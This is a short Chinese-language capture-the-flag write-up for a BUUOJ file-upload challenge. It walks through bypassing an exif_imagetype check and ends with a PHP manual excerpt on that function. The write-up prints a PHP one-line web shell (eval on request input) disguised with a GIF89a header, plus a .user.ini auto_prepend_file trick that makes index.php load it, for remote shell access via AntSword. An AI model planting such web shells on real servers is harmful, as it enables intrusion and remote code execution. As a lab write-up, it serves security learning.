题目地址:https://buuoj.cn/challenges
解题思路
第一步:进入题目,一个提交框,猜测上传一句话木马获取shell
第二步:上传伪装过的pass.phtml,发现被拦截
第三步:上传正常的png文件发现提示:index.php
第四步:上传一句话木马图片格式,使用.user.ini让index.php文件加载一句话木马,以获取shell
-
上传一句话木马图片:
GIF89a? <script language="php">eval($_REQUEST[pass])</script>
-
上传.user.ini文件:
GIF89a auto_prepend_file=pass.png
-
使用蚁剑连接index.php获取flag。注意此处连接地址为:
buuoj.cn/uploads/d99081fe929b750e0557f85e6499103f/index.php
,上传文件提示的存放地
知识点
exif_imagetype
(PHP 4 >= 4.3.0, PHP 5, PHP 7, PHP 8)
exif_imagetype — 判断一个图像的类型
说明
exif_imagetype ( string $filename ) : int
exif_imagetype() 读取一个图像的第一个字节并检查其签名。